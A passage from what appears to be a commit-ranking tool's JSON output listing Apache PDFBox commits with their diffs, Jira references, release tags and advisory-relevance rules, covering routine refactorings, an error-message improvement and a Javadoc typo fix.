b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -499,3 +499,4 @@ public final class PDPageContentStream implements Closeable", - " {", - "- for (int offset = 0; offset < text.length(); )", - "+ int offset = 0;", - "+ while (offset < text.length())", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", - "index 15f3783ed..0159d8be3 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java", - "@@ -317,3 +317,4 @@ public abstract class PDFont implements COSObjectable, PDFontLike", - " ByteArrayOutputStream out = new ByteArrayOutputStream();", - "- for (int offset = 0; offset < text.length(); )", - "+ int offset = 0;", - "+ while (offset < text.length())", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "f7f41c72c849944938bb1a72a6d36e1d4dcdb845" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "c98daf9cc58c415a888535ae7d837267aa7bc133", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529247973, - "hunks": 1, - "message": "PDFBOX-4245: consider translation in xform, as suggested by Jiri Kunhart git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833663 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "index 8b0a25235..7b16f95fa 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", - "@@ -1468,4 +1468,5 @@ public class PageDrawer extends PDFGraphicsStreamEngine", - " // Flip y", - "- return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX(),", - "- size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY(),", - "+ // PDFBOX-4245 also consider translation in xform", - "+ return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX() + xform.getTranslateX(),", - "+ size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY() + xform.getTranslateY(),", - " width, height);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4245": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "eb0d947c79c412cee8b10fbf7916b4acb8788f5e" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4245", - "relevance": 2 - } - ] - }, - { - "commit_id": "b7ea160c177fb480c2cc41db1e81a47db82e6e24", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524860047, - "hunks": 5, - "message": "PDFBOX-2941: tell field name if we're in a field git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830394 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "index d58d5befc..f169cbeb2 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "@@ -49,2 +49,5 @@ import java.awt.image.BufferedImage;", - " import java.io.IOException;", - "+import java.util.HashMap;", - "+import java.util.Map;", - "+import java.util.Map.Entry;", - " import java.util.concurrent.ExecutionException;", - "@@ -52,2 +55,6 @@ import java.util.concurrent.TimeUnit;", - " import org.apache.pdfbox.debugger.ui.HighResolutionImageIcon;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationWidget;", - "+import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;", - "+import org.apache.pdfbox.pdmodel.interactive.form.PDField;", - "@@ -71,2 +78,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " private String labelText = \"\";", - "+ private final Map rectMap = new HashMap<>();", - "@@ -79,2 +87,23 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " initUI();", - "+ initRectMap();", - "+ }", - "+", - "+ private void initRectMap()", - "+ {", - "+ PDAcroForm acroForm = document.getDocumentCatalog().getAcroForm();", - "+ if (acroForm == null)", - "+ {", - "+ return;", - "+ }", - "+ for (PDField field : acroForm.getFieldTree())", - "+ {", - "+ String fullyQualifiedName = field.getFullyQualifiedName();", - "+ for (PDAnnotationWidget widget : field.getWidgets())", - "+ {", - "+ if (page.equals(widget.getPage()))", - "+ {", - "+ rectMap.put(widget.getRectangle(), fullyQualifiedName);", - "+ }", - "+ }", - "+ }", - " }", - "@@ -252,3 +281,15 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " }", - "- statuslabel.setText(\"x: \" + x1 + \", y: \" + y1);", - "+ String text = \"x: \" + x1 + \", y: \" + y1;", - "+ ", - "+ // are we in a field widget?", - "+ for (Entry entry : rectMap.entrySet())", - "+ {", - "+ if (entry.getKey().contains(x1, y1))", - "+ {", - "+ text += \", field: \" + rectMap.get(entry.getKey());", - "+ break;", - "+ }", - "+ }", - "+", - "+ statuslabel.setText(text);", - " }" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "327767c6c319250abc704a8ae2153a2478d90226" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "9794b68761efe9af95cb046ef4281d1b4705be9c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524171781, - "hunks": 1, - "message": "PDFBOX-4071: improve error msg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829616 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "index b2ed1ff0b..99c9a6762 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "@@ -278,3 +278,4 @@ public class PDFStreamParser extends BaseParser", - " {", - "- throw new IOException( \"Error: Expected operator 'ID' actual='\" + id + \"'\" );", - "+ throw new IOException( \"Error: Expected operator 'ID' actual='\" + id +", - "+ \"' at stream offset \" + seqSource.getPosition());", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "5436705adc08fd2e2ec3ce9e6d9f7b892adf25f7" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "3f18c6f77f042dc74fb407fb740ef9c0cc3453ca", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531171118, - "hunks": 1, - "message": "PDFBOX-4071: improve javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835496 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", - "index ea2ed9185..0a212783a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java", - "@@ -149,3 +149,3 @@ public class PDFParser extends BaseParser", - " *", - "- * @param e The exception if vailable. Can be null if there is no exception available", - "+ * @param e The exception if available. Can be null if there is no exception available", - " * @return true if parsing could be continued, otherwise false" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "d0443b775ab6016c70705059c3738ccba2e8d237" - ], - [ - "no-tag", - "f8969cf7c75dd8828006b80fa125f10826bfc695" - ], - [ - "no-tag", - "20591a3f393290bfee28b01192d5ca5b176f57c3" - ], - [ - "no-tag", - "c628b70c3c02f2cea1de87c02a873b73bb8b1976" - ], - [ - "no-tag", - "2f2a6940cc131b86767f3cffe9052687401419ac" - ], - [ - "no-tag", - "5b1b2e07112afc1aac999bc39a282e9049487f26" - ], - [ - "no-tag", - "d7514ffc9679ca69d3948f7da62109b3176d6e97" - ], - [ - "no-tag", - "2c1c8e167764496c9bbd3d25ec8180abc4298514" - ], - [ - "no-tag", - "f394c98fe456aecfa93ca70810dd1f736bb3bbd3" - ], - [ - "no-tag", - "cbd8f0561f06456930e212982b2b8b5a2f1c6730" - ], - [ - "no-tag", - "b99c47e6365654b2c5fcf0cf80b19b971fec3a22" - ], - [ - "no-tag", - "417e6523f71cb4b372e7c2f7d81f04d59b7936f4" - ], - [ - "no-tag", - "7334031821c0e933f1e3e486e907b84d61717d02" - ], - [ - "no-tag", - "278e0dc0aa394464e22d1e879451f4acf54ad5a1" - ], - [ - "no-tag", - "4f031332ed8ffa9c4bf7816340ca6f5f43c94f62" - ] - ], - "tags": [ - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "ff1d90e953c5feb60174777459860602548e6865", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528135432, - "hunks": 9, - "message": "PDFBOX-4237: use InputStream instead of PDContentStream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832873 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java b/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", - "index 76dafd5fb..a33bb5b14 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", - "@@ -126,3 +126,3 @@ public final class RemoveAllText", - " {", - "- PDFStreamParser parser = new PDFStreamParser(contentStream);", - "+ PDFStreamParser parser = new PDFStreamParser(contentStream.getContents());", - " Object token = parser.parseNextToken();", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java b/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", - "index 499c7d671..42856b771 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", - "@@ -487,3 +487,3 @@ public abstract class PDFStreamEngine", - " List arguments = new ArrayList<>();", - "- PDFStreamParser parser = new PDFStreamParser(contentStream);", - "+ PDFStreamParser parser = new PDFStreamParser(contentStream.getContents());", - " Object token = parser.parseNextToken();", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "index 99c9a6762..7dc5b144e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "@@ -21,2 +21,3 @@ import java.io.ByteArrayOutputStream;", - " import java.io.IOException;", - "+import java.io.InputStream;", - " import java.util.ArrayList;", - "@@ -25,3 +26,2 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "-import org.apache.pdfbox.contentstream.PDContentStream;", - " import org.apache.pdfbox.contentstream.operator.Operator;", - "@@ -58,5 +58,5 @@ public class PDFStreamParser extends BaseParser", - " */", - "- public PDFStreamParser(PDContentStream contentStream) throws IOException", - "+ public PDFStreamParser(InputStream stream) throws IOException", - " {", - "- super(new InputStreamSource(contentStream.getContents()));", - "+ super(new InputStreamSource(stream));", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", - "index f4793dd99..40a03ffad 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", - "@@ -96,3 +96,3 @@ public final class PDType3CharProc implements COSObjectable, PDContentStream", - " List arguments = new ArrayList<>();", - "- PDFStreamParser parser = new PDFStreamParser(this);", - "+ PDFStreamParser parser = new PDFStreamParser(getContents());", - " Object token = parser.parseNextToken();", - "@@ -151,3 +151,3 @@ public final class PDType3CharProc implements COSObjectable, PDContentStream", - " List arguments = new ArrayList<>();", - "- PDFStreamParser parser = new PDFStreamParser(this);", - "+ PDFStreamParser parser = new PDFStreamParser(getContents());", - " Object token = parser.parseNextToken();", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "index 29b30148b..a8b6ceab7 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "@@ -329,3 +329,3 @@ class AppearanceGeneratorHelper", - " {", - "- PDFStreamParser parser = new PDFStreamParser(appearanceStream);", - "+ PDFStreamParser parser = new PDFStreamParser(appearanceStream.getContents());", - " parser.parse();" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/util/RemoveAllText.java", - "pdfbox/src/main/java/org/apache/pdfbox/contentstream/PDFStreamEngine.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3CharProc.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4237": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4237", - "relevance": 2 - } - ] - }, - { - "commit_id": "bf1a0637a7f6539cc78b139a66ff48c77fe00c61", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525910461, - "hunks": 25, - "message": "PDFBOX-4068: make PDAbstractContentStream package-private and move its subclasses into the same package git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831291 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "new file mode 100644", - "index 000000000..b66e1e0ba", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "@@ -0,0 +1,1587 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel;", - "+", - "+import java.awt.Color;", - "+import java.awt.geom.AffineTransform;", - "+import java.io.Closeable;", - "+import java.io.IOException;", - "+import java.io.OutputStream;", - "+import java.text.NumberFormat;", - "+import java.util.Locale;", - "+import java.util.Stack;", - "+import org.apache.pdfbox.cos.COSBase;", - "+import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.cos.COSNumber;", - "+import org.apache.pdfbox.pdfwriter.COSWriter;", - "+import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyList;", - "+import org.apache.pdfbox.pdmodel.font.PDFont;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceN;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDICCBased;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDSeparation;", - "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", - "+import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - "+import org.apache.pdfbox.pdmodel.graphics.image.PDInlineImage;", - "+import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", - "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", - "+import org.apache.pdfbox.util.Charsets;", - "+import org.apache.pdfbox.util.Matrix;", - "+import org.apache.pdfbox.util.NumberFormatUtil;", - "+", - "+/**", - "+ * Provides the ability to write to a content stream.", - "+ *", - "+ * @author Ben Litchfield", - "+ */", - "+abstract class PDAbstractContentStream implements Closeable", - "+{", - "+ private OutputStream outputStream;", - "+ private PDResources resources;", - "+", - "+ private boolean inTextMode = false;", - "+ private final Stack fontStack = new Stack<>();", - "+", - "+ private final Stack nonStrokingColorSpaceStack = new Stack<>();", - "+ private final Stack strokingColorSpaceStack = new Stack<>();", - "+", - "+ // number format", - "+ private final NumberFormat formatDecimal = NumberFormat.getNumberInstance(Locale.US);", - "+ private final byte[] formatBuffer = new byte[32];", - "+", - "+ /**", - "+ * Create a new appearance stream.", - "+ *", - "+ */", - "+ public PDAbstractContentStream()", - "+ {", - "+ formatDecimal.setMaximumFractionDigits(4);", - "+ formatDecimal.setGroupingUsed(false);", - "+ }", - "+", - "+ /**", - "+ * Create a new appearance stream.", - "+ * ", - "+ * @param outputStream The appearances output stream to write to.", - "+ */", - "+ public PDAbstractContentStream(OutputStream outputStream)", - "+ {", - "+ this.outputStream = outputStream;", - "+ this.resources = null;", - "+", - "+ formatDecimal.setMaximumFractionDigits(4);", - "+ formatDecimal.setGroupingUsed(false);", - "+ }", - "+", - "+ /**", - "+ * Sets the maximum number of digits allowed for fractional numbers.", - "+ * ", - "+ * @see NumberFormat#setMaximumFractionDigits(int)", - "+ * @param fractionDigitsNumber", - "+ */", - "+ protected void setMaximumFractionDigits(int fractionDigitsNumber)", - "+ {", - "+ formatDecimal.setMaximumFractionDigits(fractionDigitsNumber);", - "+ }", - "+ ", - "+ public OutputStream getOutputStream()", - "+ {", - "+ return outputStream;", - "+ }", - "+", - "+ public void setOutputStream(OutputStream outputStream)", - "+ {", - "+ this.outputStream = outputStream;", - "+ }", - "+ ", - "+ public PDResources getResources()", - "+ {", - "+ return resources;", - "+ }", - "+ ", - "+ public final void setResources(PDResources resources)", - "+ {", - "+ this.resources = resources;", - "+ }", - "+ ", - "+ public Stack getStrokingColorSpaceStack()", - "+ {", - "+ return strokingColorSpaceStack;", - "+ }", - "+", - "+ public Stack getNonStrokingColorSpaceStack()", - "+ {", - "+ return nonStrokingColorSpaceStack;", - "+ }", - "+", - "+ ", - "+ public boolean isInTextMode()", - "+ {", - "+ return inTextMode;", - "+ }", - "+", - "+ /**", - "+ * Begin some text operations.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream or if you attempt to", - "+ * nest beginText calls.", - "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", - "+ */", - "+ public void beginText() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: Nested beginText() calls are not allowed.\");", - "+ }", - "+ writeOperator(\"BT\");", - "+ inTextMode = true;", - "+ }", - "+", - "+ /**", - "+ * End some text operations.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream or if you attempt to", - "+ * nest endText calls.", - "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", - "+ */", - "+ public void endText() throws IOException", - "+ {", - "+ if (!inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: You must call beginText() before calling endText.\");", - "+ }", - "+ writeOperator(\"ET\");", - "+ inTextMode = false;", - "+ }", - "+ ", - "+ /**", - "+ * Set the font and font size to draw text with.", - "+ *", - "+ * @param font The font to use.", - "+ * @param fontSize The font size to draw the text.", - "+ * @throws IOException If there is an error writing the font information.", - "+ */", - "+ public void setFont(PDFont font, float fontSize) throws IOException", - "+ {", - "+ if (fontStack.isEmpty())", - "+ {", - "+ fontStack.add(font);", - "+ }", - "+ else", - "+ {", - "+ fontStack.setElementAt(font, fontStack.size() - 1);", - "+ }", - "+", - "+ writeOperand(resources.add(font));", - "+ writeOperand(fontSize);", - "+ writeOperator(\"Tf\");", - "+ }", - "+", - "+ /**", - "+ * Shows the given text at the location specified by the current text matrix with the given", - "+ * interspersed positioning. This allows the user to efficiently position each glyph or sequence", - "+ * of glyphs.", - "+ *", - "+ * @param textWithPositioningArray An array consisting of String and Float types. Each String is", - "+ * output to the page using the current text matrix. Using the default coordinate system, each", - "+ * interspersed number adjusts the current text matrix by translating to the left or down for", - "+ * horizontal and vertical text respectively. The number is expressed in thousands of a text", - "+ * space unit, and may be negative.", - "+ *", - "+ * @throws IOException if an io exception occurs.", - "+ */", - "+ public void showTextWithPositioning(Object[] textWithPositioningArray) throws IOException", - "+ {", - "+ write(\"[\");", - "+ for (Object obj : textWithPositioningArray)", - "+ {", - "+ if (obj instanceof String)", - "+ {", - "+ showTextInternal((String) obj);", - "+ }", - "+ else if (obj instanceof Float)", - "+ {", - "+ writeOperand((Float) obj);", - "+ }", - "+ else", - "+ {", - "+ throw new IllegalArgumentException(\"Argument must consist of array of Float and String types\");", - "+ }", - "+ }", - "+ write(\"] \");", - "+ writeOperator(\"TJ\");", - "+ }", - "+", - "+ /**", - "+ * Shows the given text at the location specified by the current text matrix.", - "+ *", - "+ * @param text The Unicode text to show.", - "+ * @throws IOException If an io exception occurs.", - "+ */", - "+ public void showText(String text) throws IOException", - "+ {", - "+ showTextInternal(text);", - "+ write(\" \");", - "+ writeOperator(\"Tj\");", - "+ }", - "+", - "+ /**", - "+ * Outputs a string using the correct encoding and subsetting as required.", - "+ *", - "+ * @param text The Unicode text to show.", - "+ * ", - "+ * @throws IOException If an io exception occurs.", - "+ */", - "+ protected void showTextInternal(String text) throws IOException", - "+ {", - "+ if (!inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Must call beginText() before showText()\");", - "+ }", - "+", - "+ if (fontStack.isEmpty())", - "+ {", - "+ throw new IllegalStateException(\"Must call setFont() before showText()\");", - "+ }", - "+", - "+ PDFont font = fontStack.peek();", - "+", - "+ // Unicode code points to keep when subsetting", - "+ if (font.willBeSubset())", - "+ {", - "+ for (int offset = 0; offset < text.length(); )", - "+ {", - "+ int codePoint = text.codePointAt(offset);", - "+ font.addToSubset(codePoint);", - "+ offset += Character.charCount(codePoint);", - "+ }", - "+ }", - "+", - "+ COSWriter.writeString(font.encode(text), outputStream);", - "+ }", - "+", - "+ /**", - "+ * Sets the text leading.", - "+ *", - "+ * @param leading The leading in unscaled text units.", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ public void setLeading(float leading) throws IOException", - "+ {", - "+ writeOperand(leading);", - "+ writeOperator(\"TL\");", - "+ }", - "+", - "+ /**", - "+ * Move to the start of the next line of text. Requires the leading (see {@link #setLeading})", - "+ * to have been set.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ public void newLine() throws IOException", - "+ {", - "+ if (!inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Must call beginText() before newLine()\");", - "+ }", - "+ writeOperator(\"T*\");", - "+ }", - "+", - "+ /**", - "+ * The Td operator.", - "+ * Move to the start of the next line, offset from the start of the current line by (tx, ty).", - "+ *", - "+ * @param tx The x translation.", - "+ * @param ty The y translation.", - "+ * @throws IOException If there is an error writing to the stream.", - "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", - "+ */", - "+ public void newLineAtOffset(float tx, float ty) throws IOException", - "+ {", - "+ if (!inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: must call beginText() before newLineAtOffset()\");", - "+ }", - "+ writeOperand(tx);", - "+ writeOperand(ty);", - "+ writeOperator(\"Td\");", - "+ }", - "+", - "+ /**", - "+ * The Tm operator. Sets the text matrix to the given values.", - "+ * A current text matrix will be replaced with the new one.", - "+ *", - "+ * @param matrix the transformation matrix", - "+ * @throws IOException If there is an error writing to the stream.", - "+ * @throws IllegalStateException If the method was not allowed to be called at this time.", - "+ */", - "+ public void setTextMatrix(Matrix matrix) throws IOException", - "+ {", - "+ if (!inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: must call beginText() before setTextMatrix\");", - "+ }", - "+ 